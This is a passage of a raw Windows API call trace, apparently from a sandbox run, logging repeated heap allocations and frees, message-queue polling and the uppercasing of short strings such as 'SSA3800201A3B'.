RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0166.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0166.095] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0166.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.096] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0166.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0166.096] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0166.096] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.096] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0166.096] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.096] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.096] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0166.097] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.097] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0166.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.097] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0166.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.098] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.098] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0166.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.099] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.099] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.099] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13100) returned 0x34eb568 [0166.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13100) returned 0x3511778 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34eb568 | out: hHeap=0x25c0000) returned 1 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0166.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13100) returned 0x34eb568 [0166.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3511778 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13100) returned 0x3511778 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34eb568 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d8460 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c5358 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34fe670 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0166.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0166.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0166.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0166.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0166.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13100) returned 0x24d7a58 [0166.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3511778 | out: hHeap=0x25c0000) returned 1 [0166.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 